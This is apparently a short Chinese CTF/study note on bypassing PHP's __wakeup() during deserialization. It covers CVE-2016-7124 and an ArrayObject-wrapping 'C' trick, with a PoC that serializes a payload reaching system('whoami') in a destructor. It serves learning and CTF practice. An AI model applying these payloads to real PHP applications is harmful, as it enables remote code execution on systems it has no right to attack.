关联:PHP安全总览反序列化基础

详细看PHP反序列化中wakeup()绕过总结 – fushulingのblog

1. cve-2016-7124

`对象的属性个数大于实际个数 影响范围:

  • PHP5 < 5.6.25
  • PHP7 < 7.0.10

2. C绕过

直接把O改为C只能只能构造和析构,我们可以把类放入数组,利用new ArraryObject,打包

<?php
 
class ctfshow {
    public $ctfshow;
    
    public function __wakeup(){
        die("not allowed!");
    }
    
    public function __destruct(){
        echo "OK";
        system($this->ctfshow);
    }
}
$a=new ctfshow;
$a->ctfshow="whoami";
$arr=array("evil"=>$a);
$oa=new ArrayObject($arr);
$res=serialize($oa);
echo $res;
//unserialize($res)
?>
#C:11:"ArrayObject":77:{x:i:0;a:1:{s:4:"evil";O:7:"ctfshow":1:{s:7:"ctfshow";s:6:"whoami";}};m:a:0:{}}
ArrayObject::unserialize
ArrayIterator::unserialize
RecursiveArrayIterator::unserialize
SplObjectStorage::unserialize
//这些类也是以C开头